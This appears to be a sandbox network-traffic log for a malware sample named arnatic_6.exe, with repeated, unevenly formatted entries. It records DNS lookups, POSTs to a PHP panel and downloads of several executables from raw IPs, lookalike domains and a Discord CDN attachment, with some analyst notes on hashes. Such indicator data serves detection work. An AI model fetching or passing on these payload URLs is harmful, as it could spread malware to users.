                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://79.174.12.174/base/api/getData.php
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        79.174.12.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /base/api/getData.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                        Host: 79.174.12.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:21 GMT
                                                                                                                                                                                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
                                                                                                                                                                                        X-Powered-By: PHP/8.0.7
                                                                                                                                                                                        Content-Length: 263
                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
http://79.174.12.174/base/api/getData.php
arnatic_6.exe
Remote address: 79.174.12.174:80
Request
  POST /base/api/getData.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Content-Length: 133
  Host: 79.174.12.174
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:21 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
  X-Powered-By: PHP/8.0.7
  Content-Length: 263
  Keep-Alive: timeout=5, max=97
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8

POST http://79.174.12.174/base/api/getData.php
arnatic_6.exe
Remote address: 79.174.12.174:80
Request
  POST /base/api/getData.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Content-Length: 133
  Host: 79.174.12.174
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:22 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
  X-Powered-By: PHP/8.0.7
  Content-Length: 263
  Keep-Alive: timeout=5, max=96
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8

POST http://79.174.12.174/base/api/getData.php
arnatic_6.exe
Remote address: 79.174.12.174:80
Request
  POST /base/api/getData.php HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Content-Length: 133
  Host: 79.174.12.174
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:23 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
  X-Powered-By: PHP/8.0.7
  Content-Length: 2112
  Keep-Alive: timeout=5, max=95
  Connection: Keep-Alive
  Content-Type: text/html; charset=UTF-8

HEAD http://136.144.41.201/WW/file2.exe
arnatic_6.exe
Remote address: 136.144.41.201:80
Request
  HEAD /WW/file2.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:24 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Thu, 01 Jul 2021 10:45:11 GMT
  ETag: "cc000-5c60d88942c4a"
  Accept-Ranges: bytes
  Content-Length: 835584
  Content-Type: application/x-msdos-program

HEAD http://136.144.41.201/WW/file6.exe
arnatic_6.exe
Remote address: 136.144.41.201:80
Request
  HEAD /WW/file6.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:24 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Thu, 01 Jul 2021 08:23:41 GMT
  ETag: "5fd88-5c60b8e869d95"
  Accept-Ranges: bytes
  Content-Length: 392584
  Content-Type: application/x-msdos-program

GET http://136.144.41.201/WW/file4.exe
arnatic_6.exe
Remote address: 136.144.41.201:80
Request
  GET /WW/file4.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:24 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Thu, 01 Jul 2021 18:16:25 GMT
  ETag: "176ac0-5c613d64ed0f5"
  Accept-Ranges: bytes
  Content-Length: 1534656
  Content-Type: application/x-msdos-program

HEAD http://136.144.41.201/WW/file4.exe
arnatic_6.exe
Remote address: 136.144.41.201:80
Request
  HEAD /WW/file4.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:24 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Thu, 01 Jul 2021 18:16:25 GMT
  ETag: "176ac0-5c613d64ed0f5"
  Accept-Ranges: bytes
  Content-Length: 1534656
  Content-Type: application/x-msdos-program

HEAD http://136.144.41.201/WW/file3.exe
arnatic_6.exe
Remote address: 136.144.41.201:80
Request
  HEAD /WW/file3.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 136.144.41.201
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Fri, 02 Jul 2021 07:15:24 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Last-Modified: Fri, 02 Jul 2021 07:04:22 GMT
  ETag: "a54c8-5c61e90b9eba8"
  Accept-Ranges: bytes
  Content-Length: 677064
  Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file2.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file2.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 10:45:11 GMT
                                                                                                                                                                                        ETag: "cc000-5c60d88942c4a"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 835584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file3.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.20.227.194:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /install.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 185.20.227.194
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        176.99.131.168
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        89.221.213.3
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.65.45
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.158.82
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.202.130
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.76.249
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.135.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.129.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.133.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.134.233
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        162.159.130.233
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
DNS flamkravmaga.com (arnatic_6.exe)
Remote address: 8.8.8.8:53
Request
flamkravmaga.com IN A
Response

DNS flamkravmaga.com (arnatic_6.exe)
Remote address: 8.8.8.8:53
Request
flamkravmaga.com IN A
Response

HEAD http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe (arnatic_6.exe)
Remote address: 89.221.213.3:80
Request
HEAD /campaign1/SunLabsPlayer.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.quickfastfuriousloaded.com
Cache-Control: no-cache

HEAD http://fikerty.info/app.exe (arnatic_6.exe)
Remote address: 172.67.202.130:80
Request
HEAD /app.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: fikerty.info
Cache-Control: no-cache
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 02 Jul 2021 07:15:24 GMT
Content-Type: text/html
Connection: keep-alive
Location: https://fackerty.info/app.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ZrtzrFcG6RqZLDuPT2OLBUhIvWqBrH8WNU%2BcqGJLkOu%2B80XQwODyiZxjZYxd6OwvahHEWmwguZak1d0CFNYT3NIeEcF%2BHe6Q3OKdMTXbbQdCqL3tVwhCjYDS"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686152d7d282ba1-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET http://fikerty.info/app.exe (arnatic_6.exe)
Remote address: 172.67.202.130:80
Request
GET /app.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: fikerty.info
Cache-Control: no-cache
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, 02 Jul 2021 07:15:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://fackerty.info/app.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9yPD875bfR%2FkvsMLhCX6B3iHLEYwccTq1Jx%2FjddQzzFgSP4mi0SDQWeMl55XWZhYgW%2Fr%2FC7sP%2BawDPujW%2BrwcUcdxKbnnd3S9YJoGIMr0pIB5zcjJ38LBUr%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861541cf1e2ba1-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

DNS mebbing.com
Remote address: 8.8.8.8:53
Request
mebbing.com IN A
Response

DNS mebbing.com
Remote address: 8.8.8.8:53
Request
mebbing.com IN A
Response

DNS mebbing.com
Remote address: 8.8.8.8:53
Request
mebbing.com IN A
Response

DNS mebbing.com
Remote address: 8.8.8.8:53
Request
mebbing.com IN A
Response

HEAD http://name-usa.info/app/files/dc/id27315003/compan.exe (arnatic_6.exe)
Remote address: 176.99.131.168:80
Request
HEAD /app/files/dc/id27315003/compan.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: name-usa.info
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 02 Jul 2021 07:15:24 GMT
Content-Type: application/x-msdos-program
Content-Length: 1112064
Connection: keep-alive
Last-Modified: Wed, 30 Jun 2021 20:09:14 GMT
ETag: "10f800-5c6014be6c331"
Accept-Ranges: bytes

GET http://name-usa.info/app/files/dc/id27315003/compan.exe (arnatic_6.exe)
Remote address: 176.99.131.168:80
Request
GET /app/files/dc/id27315003/compan.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: name-usa.info
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 02 Jul 2021 07:15:24 GMT
Content-Type: application/x-msdos-program
Content-Length: 1112064
Connection: keep-alive
Last-Modified: Wed, 30 Jun 2021 20:09:14 GMT
ETag: "10f800-5c6014be6c331"
Accept-Ranges: bytes

POST http://iw.gamegame.info/report7.4.php (SystemNetworkService)
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab91e900001e65cf069000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8IxKeX7wbVwtiRkz7WEhCcO0oF7ZnkHcjc3ddMydTwY4lQa1OoIGOAfvsOw2ceXwRtLBij%2BfTXu2bEl72xX8WUiItNpJwETykvlUZbDI8lq5Vg8yz43fanOLMj2upQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686152fd9a91e65-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
DNS fackerty.info
Process: arnatic_6.exe
Remote address: 8.8.8.8:53
Request
fackerty.info IN A
Response
fackerty.info IN A 172.67.155.53
fackerty.info IN A 104.21.89.3
• flag-unknown
HEAD https://fackerty.info/app.exe
Process: arnatic_6.exe
Remote address: 172.67.155.53:443
Request
HEAD /app.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Cache-Control: no-cache
Host: fackerty.info
Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:15:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ab9a220000d6c9150df000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Pn3fc2xNhKhjgZO0VG9ow%2BfhdrhWVzfoQ4NuM46dhE5BFYQSMfCCIQIJsb%2F%2FZQnrFlMJYJM5%2B80NINqGi%2F0NBjlfopku4Xus%2FhonIUsM%2BnMlSMMrZ7dJnvRgXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686153d0bcfd6c9-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
GET https://jom.diregame.live/userf/2201/google-game.exe
Process: arnatic_6.exe
Remote address: 104.21.65.45:443
Request
GET /userf/2201/google-game.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: jom.diregame.live
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:15:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ab9fa10000324c711c6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gXWLSlcS0VsI0G3Mz3VtUxSDaaYQWLDDUsW45qt1u6mcDokm40lAwkSw3WlPqQJmQUk0Mm%2FlEEPvYwuRP%2BuBZNIHeC2XAbQHMUvlajH8ert7p35abZDGauWv%2FnpJj3E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66861545ced1324c-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
GET http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
Process: arnatic_6.exe
Remote address: 89.221.213.3:80
Request
GET /campaign1/SunLabsPlayer.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.quickfastfuriousloaded.com
Cache-Control: no-cache
• flag-unknown
GET http://185.20.227.194/install.exe
Process: arnatic_6.exe
Remote address: 185.20.227.194:80
Request
GET /install.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 185.20.227.194
Cache-Control: no-cache
• flag-unknown
DNS flamkravmaga.com
Process: arnatic_6.exe
Remote address: 8.8.8.8:53
Request
flamkravmaga.com IN A
Response: (empty)
• flag-unknown
DNS flamkravmaga.com
Process: arnatic_6.exe
Remote address: 8.8.8.8:53
Request
flamkravmaga.com IN A
Response: (empty)
• flag-unknown
DNS flamkravmaga.com
Process: arnatic_6.exe
Remote address: 8.8.8.8:53
Request
flamkravmaga.com IN A
Response: (empty)
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
GET  https://fackerty.info/app.exe
  Process:        arnatic_6.exe
  Remote address: 172.67.155.53:443
  Note: the 403 carries CF-Chl-Bypass: 1 and an HTML body, i.e. a Cloudflare challenge page; app.exe itself was not delivered by this request. The User-Agent is a fixed Chrome 74 string sent by arnatic_6.exe, not by a browser.
  Request:
    GET /app.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Cache-Control: no-cache
    Host: fackerty.info
    Connection: Keep-Alive
  Response:
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:15:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07aba4fb00002ba1f2af0000000001
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4GI%2Fu3yrHNVqv8Ndh8N5gclxwCzzu68n1%2FRpnLYBsC1WgSkfIk8EY2krHkQ14JlrgOHxiCddjxi5RDsKUo2rr9sdcdQTAmMATkMUQbDp%2BLKdHoYCHqgc9yJ8hA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6686154e59512ba1-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
DNS  twcamel.com
  Remote address: 8.8.8.8:53
  Request:        twcamel.com IN A
  Response:       (none recorded)

DNS  twcamel.com
  Remote address: 8.8.8.8:53
  Request:        twcamel.com IN A
  Response:       (none recorded)

DNS  twcamel.com
  Remote address: 8.8.8.8:53
  Request:        twcamel.com IN A
  Response:       (none recorded)

DNS  twcamel.com
  Remote address: 8.8.8.8:53
  Request:        twcamel.com IN A
  Response:       (none recorded)
GET  https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp
  Process:        arnatic_6.exe
  Remote address: 162.159.135.233:443
  Note: a 630784-byte attachment download served under an image MIME type to arnatic_6.exe. The ETag is the hex form of the base64 MD5 in x-goog-hash (647266eb24785b16c9fb54bc3040dd62), so it can be used directly as the file hash for pivoting.
  Request:
    GET /attachments/855697945679888404/860411180802899998/file2.bmp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: cdn.discordapp.com
    Cache-Control: no-cache
  Response:
    HTTP/1.1 200 OK
    Date: Fri, 02 Jul 2021 07:15:32 GMT
    Content-Type: image/x-ms-bmp
    Content-Length: 630784
    Connection: keep-alive
    CF-Ray: 6686155f0d8096f2-FRA
    Accept-Ranges: bytes
    Age: 1147
    Cache-Control: public, max-age=31536000
    Content-Disposition: attachment;%20filename=file2.bmp
    ETag: "647266eb24785b16c9fb54bc3040dd62"
    Expires: Sat, 02 Jul 2022 07:15:32 GMT
    Last-Modified: Fri, 02 Jul 2021 06:46:51 GMT
    Vary: Accept-Encoding
    CF-Cache-Status: HIT
    Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    x-goog-generation: 1625208411232606
